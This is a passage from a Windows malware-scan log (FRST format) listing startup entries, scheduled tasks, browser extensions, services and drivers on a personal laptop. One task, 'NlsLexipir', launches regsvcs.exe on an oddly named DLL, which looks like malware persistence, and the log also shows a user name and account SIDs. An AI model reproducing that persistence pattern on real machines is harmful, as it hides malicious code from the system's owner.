Corporation\NvNode\nvnodejslauncher.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2> (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (Qualcomm Atheros -> Windows ® Win 7 DDK provider) C:\Windows\System32\AdminService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> ) HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [USB Security] => C:\Program Files (x86)\USB Disk Security\USBGuard.exe [695528 2015-01-31] (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> ) HKLM-x32\...\Run: [TeamsMachineInstaller] => C:\Program Files (x86)\Teams Installer\Teams.exe [114671912 2021-02-10] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\root\Office16\lync.exe [26374984 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\FRANCIS\AppData\Local\Microsoft\Teams\Update.exe [2452664 2020-12-10] (Microsoft 3rd Party Application Component -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [com.squirrel.Teams.Teams] => C:\Users\PC Gamer Jones\AppData\Local\Microsoft\Teams\Update.exe --processStart "Teams.exe" --process-start-args "--system-initiated" HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [Exetender] => "C:\Program Files (x86)\Free Ride Games\GPlayer.exe" /runonstartup HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GenuineService.lnk [2019-08-09] ShortcutTarget: GenuineService.lnk -> C:\Users\FRANCIS\Autodesk\Genuine Service\GenuineService.exe (Autodesk, Inc. -> Autodesk) Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2021-04-08] ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation) HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {030D016F-C42A-4638-8891-3F3AD473EC60} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {06CECE40-6FA4-4D81-9806-5215ACA506EC} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {1799BC3D-AF55-4040-97AA-B6746FAAFB67} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {1DB835C3-2613-4254-88FD-E2BCCD03CED9} - System32\Tasks\McInstruTrack => C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe [775360 2020-12-15] (McAfee, LLC. -> McAfee, LLC.) Task: {2265CEEA-A032-4BDF-93EA-F29054F3DE5C} - System32\Tasks\McAfee\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe [1889696 2021-04-28] (McAfee, Inc. -> McAfee, LLC.) Task: {257132D5-DB23-4063-BC46-F6858F9477E3} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {261B4330-E64A-44CC-8530-3D8BDD56EF74} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC) Task: {33517268-D16F-47DC-8C91-E259FE340A49} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {3C12DCA7-5046-47AA-AD6B-04B33D166576} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {466EBA7D-08E1-468E-92F3-C295C9758910} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {48D9B3B6-4450-487D-A4D0-EE744CDCA45B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {490721B9-A199-4631-B59B-12050CB6CB5F} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {6320F9EA-93EA-4A88-990D-32413D851D71} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62392 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {637782C4-306B-4960-9A86-CB4EDC830D3E} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4630104 2021-02-03] (McAfee, LLC -> McAfee, LLC) Task: {642F9BCA-62E6-4423-AE6F-17028198A2D9} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {6670CD9E-0E7D-4947-9D64-60839CE52340} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {6B183E82-1785-4DE7-821C-E43992C810C3} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {70E7D95C-F343-4480-8444-15E0F8965F4C} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {71643631-02C0-454A-94E7-2E21E49D1E8A} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.102\DADUpdater.exe [4114728 2021-04-26] (McAfee, LLC -> McAfee, LLC) Task: {7AF1B6B9-494A-4503-B5CF-3AB48BC7D2C4} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [143888 2021-03-02] (Lenovo -> Lenovo Group Ltd.) Task: {7E2969D5-A5A7-4250-A26F-21D4EB53A6EC} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC) Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software) Task: {8A1F08FE-1A68-4EDA-846F-136862319E8B} - System32\Tasks\MATLAB R2019b Startup Accelerator => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe [53248 2019-07-19] () [File not signed] Task: {8EF0C3D4-9F36-4C5A-B40F-9ED049FEBD76} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\59b8c9d3-b395-4eb2-8edc-6e897f84c883 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {901DC0CF-2F8E-4997-9EDF-E6D41C130D8A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {91E13CB6-EBE8-44AB-9331-14D7A32E45A7} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\39a63f2d-0daf-4b9b-a96d-bc584b800309 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {93BD2383-BEA9-47CC-9D6C-EEE5A3501F2C} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> ) Task: {9E5D1EA3-A99B-4D01-B17C-A4732318731E} - System32\Tasks\Microsoft\NlsLexipir => C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe "C:\Program Files (x86)\Common Files\NotesDriver\ClyentrAgent\SETwm_2x80.dll" Task: {A3A4E228-8FE6-4395-8B08-E98D22A50764} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-3936790745-3440936247-791344644-1001 => C:\Users\FRANCIS\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe [87848 2021-05-03] (Lenovo (Beijing) Limited -> Lenovo Group Limited) Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.) Task: {BB90F46A-CD76-4EEA-A3F9-8BC323B4FD3A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C44E6E04-62B1-4B13-9759-2FF67153F57D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3336560 2021-04-08] (NVIDIA Corporation -> NVIDIA Corporation) Task: {C9BB156E-B929-493E-9E5D-2743713C9B37} - System32\Tasks\Microsoft\Office\Office Serviceability Manager => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\officesvcmgr.exe [4071016 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {D238A51C-A36E-4720-AE7B-2697714881C7} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [740760 2021-03-31] (McAfee, LLC -> McAfee, LLC) Task: {D72A7211-88AD-4D37-AD44-D1A374E9A11A} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {DA539217-6EA6-4242-8857-3ACB67528549} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {DC68A6EB-3D9A-40BD-81B8-A8C2AC8E31E3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService Task: {E08158BD-7182-439B-89FB-AD55823E9894} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> ) Task: {E0C41DCC-6827-4AFF-9AAA-28525F7C268E} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log Task: {E3424804-21BB-417A-984C-D46CE18CA2BA} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\e4e6c1f8-eed0-466c-8078-a92c0fd7e85a => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {E77F4ED0-6284-4289-AF0B-A7E350FB4A86} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\d0bc3793-ac32-4e9f-9c52-27f20cb62f47 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {E888FAEB-9001-4367-BAB5-DFB95CCD3217} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: Hosts file not detected in the default directory Tcpip\Parameters: [DhcpNameServer] 192.168.15.1 Tcpip\..\Interfaces\{204a6e4f-bb21-4465-afa7-eb9d10065002}: [DhcpNameServer] 192.168.15.1 Tcpip\..\Interfaces\{29e88bd8-7886-4ff5-af4c-24b71a9c5f1d}: [DhcpNameServer] 192.168.15.1 Edge: ======= DownloadDir: C:\Users\FRANCIS\Downloads Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] Edge DefaultProfile: Default Edge Profile: C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default [2021-05-07] Edge DownloadDir: C:\Users\FRANCIS\Downloads Edge Session Restore: Default -> is enabled. Edge Extension: (Outlook) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-10-20] Edge Extension: (Hotspot Shield Free VPN Proxy - Unlimited VPN) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cdbkakmeogejmlpgioplhjkaablahbmj [2021-02-18] Edge Extension: (Grammarly for Microsoft Edge) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cnlefmmeadmemmdciolhbnfeacpdfbkd [2021-05-06] Edge Extension: (Adblock Plus - free ad blocker) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gmgoamodcdcjnbaobigkjelfplakmdhh [2021-02-19] Edge Extension: (Word) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-10-20] Edge Extension: (Malwarebytes Browser Guard) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-05-06] Edge Extension: (Momentum) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jdoanlopeanabgejgmdncljhkdplcfed [2021-05-06] Edge Extension: (Excel) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-10-20] Edge Extension: (PowerPoint) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-10-20] Edge Extension: (Mapua Enrollment Bot) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\pboendiadmllnchnkaooickindpppinl [2021-02-18] Edge HKLM-x32\...\Edge\Extension: [ihcjicgdanjaechkgeegckofjjedodee] FireFox: ======== FF DefaultProfile: gwnyf9lv.default FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\gwnyf9lv.default [2021-03-30] FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release [2021-05-04] FF Extension: (Greasemonkey) - C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2021-03-30] FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2021-04-28] [Legacy] [not signed] FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2021-03-31] (McAfee, LLC -> ) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2021-03-31] (McAfee, LLC -> ) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-04-21] (Adobe Inc. -> Adobe Systems Inc.) Chrome: ======= CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee] ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8798600 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [File not signed] S2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) S3 FvSvc; C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe [409456 2021-03-30] (NVIDIA Corporation -> NVIDIA) R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7391408 2021-05-06] (Malwarebytes Inc -> Malwarebytes) R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971976 2021-04-30] (McAfee, LLC -> McAfee, LLC) R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_12\McApExe.exe [780032 2021-03-31] (McAfee, LLC -> McAfee, LLC) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [583344 2020-11-03] (McAfee, LLC -> McAfee, LLC) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\\McCSPServiceHost.exe [2787160 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1631736 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 OfficeSvcManagerAddons; C:\WINDOWS\system32\dllhost.exe /Processid:{2CA2E202-932F-4BA2-8771-195BB86398F5} [21312 2020-10-16] (Microsoft Windows -> Microsoft Corporation) R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4241112 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\NisSrv.exe [2624104 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe [128376 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.) S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75712 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [218960 2020-05-26] (McAfee, LLC -> McAfee, Inc.) R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220752 2021-05-06] (Malwarebytes Inc -> Malwarebytes) S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-05-06] (Malwarebytes Inc -> Malwarebytes) R2 McPvDrv; C:\WINDOWS\system32\drivers\McPvDrv.sys [89112 2021-01-18] (McAfee, LLC -> McAfee, LLC) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [544704 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [385984 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85944 2020-12-11] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [522176 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [1027520 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [608192 2020-12-17] (McAfee, Inc. -> McAfee LLC.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [107968 2020-12-17] (McAfee, Inc. -> McAfee LLC.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116672 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [125688 2021-04-25] (McAfee, Inc. -> McAfee, Inc.) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252352 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 tapnordvpn; C:\WINDOWS\System32\drivers\tapnordvpn.sys [44896 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project) S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [49560 2021-04-11] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [421088 2021-04-11] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [72928 2021-04-11] 